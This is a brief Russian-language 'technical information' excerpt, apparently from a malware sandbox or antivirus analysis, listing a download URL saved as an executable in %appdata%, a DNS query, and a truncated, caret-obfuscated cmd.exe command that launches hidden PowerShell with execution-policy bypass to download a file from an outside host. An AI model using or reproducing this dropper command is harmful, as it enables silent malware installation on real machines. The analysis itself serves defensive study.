Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^e^R^shEl^L.^exe^ ^-Exec^UTIonPo^liCY^ ^BYP^aS^S^ -^nopROf^ilE -^W^iND^O^ws^ty^LE ^HI^dd^eN (N^e^W^-objec^t^ S^Ys^tEm.NeT.w^e^bcL^I^E^nt)^.dOWNL^OADFiL^E(^'http://bestflo...
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /c "pO^W^e^R^shEl^L.^exe^ ^-Exec^UTIonPo^liCY^ ^BYP^aS^S^ -^nopROf^ilE -^W^iND^O^ws^ty^LE ^HI^dd^eN (N^e^W^-objec^t^ S^Ys^tEm.NeT.w^e^bcL^I^E^nt)^.dOWNL^OADFiL^E(^'http://bestflo...' (со скрытым окном)